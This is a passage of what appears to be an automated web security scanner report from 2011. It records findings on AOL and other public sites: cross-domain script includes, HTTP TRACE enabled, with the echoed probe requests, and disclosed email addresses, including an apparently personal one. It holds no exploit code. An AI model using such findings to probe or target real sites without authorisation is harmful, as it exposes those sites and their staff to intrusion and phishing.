Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<link type="text/css" rel="stylesheet" media="screen, projection" href="http://www.aolcdn.com/ke/dm/definingmoments-v4.css" />
   <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</style>

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>

<script src="http://o.aolcdn.com/art/merge/?f=/popeater/sonar2.js&f=/popeater/cross-promo.js&f=/popeater/popeater.js&f=/us_popeater/profile_ajax.js&f=/us_popeater/profile_main.js&expsec=31536000&ver=1i" type="text/javascript"></script>

<script type="text/javascript" src="http://www.blogsmithmedia.com/www.popeater.com/include/tabbed-search-header.js?2"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.popeater.com/include/related-links.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.css" />
       <script type="text/javascript" src="http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js"></script>
       <script src="http://o.aolcdn.com/feedback/feedback1.js" type="text/javascript"></script>
...[SNIP]...
<div class="galleryLauncher"><script src='http://www.aolcdn.com/keyexp/kits/ke_kits.js' type='text/javascript' language='javascript' charset='utf-8'></script>
...[SNIP]...
</div>

    <script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare-1.2.min.js&ver=4" type="text/javascript"></script>
...[SNIP]...
</body>
<script type="text/javascript" src="http://o.aolcdn.com/art/_media/ke_tools/mmx_refresh_patch.js"></script>
...[SNIP]...

17.143. http://www.truveo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://d1.openx.org/spcjs.php?id=16336
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://secure.quantserve.com/quant.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"></script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<center>
<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=16336'></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.144. http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /client/versions/univ_ent/js/truveo.libs.util.v1304543460.js HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; ab=univ_ent; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Expires: Mon, 28 Jul 2014 23:30:00 GMT
Cache-Control: max-age=315360000
Access-Control-Allow-Oritin: *
Content-Type: application/x-javascript
Content-Length: 35730

//alert('loading util.truveo.js');
/*--------------------------------------------------
Class Hook: Allows to classify your functions into
sub-classes and then run them all in

...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

17.145. http://www.truveo.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://d1.openx.org/spcjs.php?id=16336
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://secure.quantserve.com/quant.js
http://static.addtoany.com/menu/page.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"></script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<center>
<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=16336'></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script> -->
<script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.146. http://www.tuaw.com/hub/app-reviews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/hub/app-reviews

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn-static.viddler.com/js/replacer.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&os=4&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.min.js
http://www.blogsmithmedia.com/learn2.aol.com/static/learn.deploy.js
http://www.blogsmithmedia.com/www.tuaw.com/include/contact.js
http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalheader.js
http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalsearchbox.js
http://www.blogsmithmedia.com/www.tuaw.com/include/pr-hider.js
http://www.flickr.com/badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:15 GMT; path=/
Content-Type: text/html
Content-Length: 32604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
<link rel="apple-touch-icon" href="http://www.blogsmithmedia.com/www.tuaw.com/media/apple-touch-icon-v2.png" type="image/png" />
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
<tr>
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?show_name=1&count=3&display=latest&size=t&layout=h&source=all_tag&tag=tuaw&user=15453323%40N00"></script>
...[SNIP]...
</script><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js" type="text/javascript"></script>
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&os=4&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/contact.js"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/pr-hider.js"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalheader.js"></script>
<script type="text/javascript" src="http://www.blogsmithmedia.com/www.tuaw.com/include/jquery-globalsearchbox.js"></script>
...[SNIP]...
</script>
<script src="http://cdn-static.viddler.com/js/replacer.js"> </script>
...[SNIP]...
</html>
<script src="http://www.blogsmithmedia.com/learn2.aol.com/static/learn.deploy.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

17.147. http://yellowpages.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://yellowpages.aol.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/omniunih.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/i18ntext.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/locmngr.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/prototype.js
http://o.aolcdn.com/yp/statics/aolyp/js131010/yp.js

Request

Response

18. TRACE method is enabled previous next
There are 12 instances of this issue:

http://www.aim.com/
http://www.aolnews.com/
http://www.citysbest.com/
http://www.crunchboard.com/
http://www.dailyfinance.com/
http://www.dooce.com/
http://www.mmafighting.com/
http://www.moviefone.com/
http://www.popeater.com/
http://www.truveo.com/
http://www.tuaw.com/
http://xml.truveo.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://www.aim.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aim.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: e4208140e9f6ef90

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: e4208140e9f6ef90
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243

18.2. http://www.aolnews.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aolnews.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: e98c48ca3b0eac0e

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aolnews.com
Cookie: e98c48ca3b0eac0e
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:19:B648:200483,x-lb-client-ip:ajg_u

18.3. http://www.citysbest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.citysbest.com
Cookie: 2a68d37c3676e45f

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:37 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.citysbest.com
Cookie: 2a68d37c3676e45f
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:26:D7F9:200483,x-lb-client-ip:ajg_u

18.4. http://www.crunchboard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crunchboard.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.crunchboard.com
Cookie: 909a9a7d36bb21dd

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:10:34 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crunchboard.com
Cookie: 909a9a7d36bb21dd

18.5. http://www.dailyfinance.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.dailyfinance.com
Cookie: 1690502dfd21ec63

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dailyfinance.com
Cookie: 1690502dfd21ec63
Connection: Keep-Alive
X-LB-Client-IP: 64.12.173.49
X-Forwarded-For: 173.193.214.243,64.12.173.49
X-CHAD: 6:1:22:43BE:200483,x-lb-client-ip:ajg_u

18.6. http://www.dooce.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: e83399b35ee8b978

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: e83399b35ee8b978

18.7. http://www.mmafighting.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mmafighting.com
Cookie: fe6cb9d1815c28a3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mmafighting.com
Cookie: fe6cb9d1815c28a3
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:22:EFBD:200483,x-lb-client-ip:ajg_u

18.8. http://www.moviefone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.moviefone.com
Cookie: 5f1a0b59b4bf2237

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.moviefone.com
Cookie: 5f1a0b59b4bf2237
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:19:B986:200483,x-lb-client-ip:ajg_u

18.9. http://www.popeater.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.popeater.com
Cookie: 3c494aeadfb16927

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.popeater.com
Cookie: 3c494aeadfb16927
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:27:4BD6:200483,x-lb-client-ip:ajg_u

18.10. http://www.truveo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.truveo.com
Cookie: 99c70a0bf2084743

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.truveo.com
Cookie: 99c70a0bf2084743
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243

18.11. http://www.tuaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.tuaw.com
Cookie: b86452e58c6d22a4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tuaw.com
Cookie: b86452e58c6d22a4
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:22:90FB:200483,x-lb-client-ip:ajg_u

18.12. http://xml.truveo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xml.truveo.com
Path:	/

Request

TRACE / HTTP/1.0
Host: xml.truveo.com
Cookie: c5647c4367687c01

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: xml.truveo.com
Cookie: c5647c4367687c01
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243

19. Email addresses disclosed previous next
There are 18 instances of this issue:

http://www.dailyfinance.com/markets/mostactives
http://www.games.com/browse-games/all/
http://www.games.com/game-play/family-feud/single
http://www.games.com/game/family-feud/
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.godaddy.com/gdshop/hosting/landing.asp
http://www.google.com/s
http://www.google.com/search
http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html
http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html
http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
http://www.lakewoodbeacon.org/
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
https://www.neodata.com/pub/snew/new_print.shtml
http://www.popeater.com/
http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. http://www.dailyfinance.com/markets/mostactives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/markets/mostactives

Issue detail

The following email address was disclosed in the response:

MoneyComments@aol.com

Request

Response

19.2. http://www.games.com/browse-games/all/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/browse-games/all/

Issue detail

The following email address was disclosed in the response:

larryc@games.com

Request

GET /browse-games/all/ HTTP/1.1
Host: www.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: recentGames=335;

Response

19.3. http://www.games.com/game-play/family-feud/single previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/game-play/family-feud/single

Issue detail

The following email addresses were disclosed in the response:

larryc@games.com
yourfriend@email.com

Request

Response

19.4. http://www.games.com/game/family-feud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/game/family-feud/

Issue detail

The following email addresses were disclosed in the response:

TOSProfileReport@aol.com
larryc@games.com
yourfriend@email.com

Request

Response

19.5. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

19.6. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<input class="txt_email in inp_iphone" type="text" name="pcf_email" id="pcf_email" onkeypress="pcj_key('pcj_signup()',event);" value="YourEmail@YourWebsite.com" onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com</a>
...[SNIP]...
<a style="color:blue;text-decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com</a>
...[SNIP]...

19.7. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com
support@godaddy.com

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
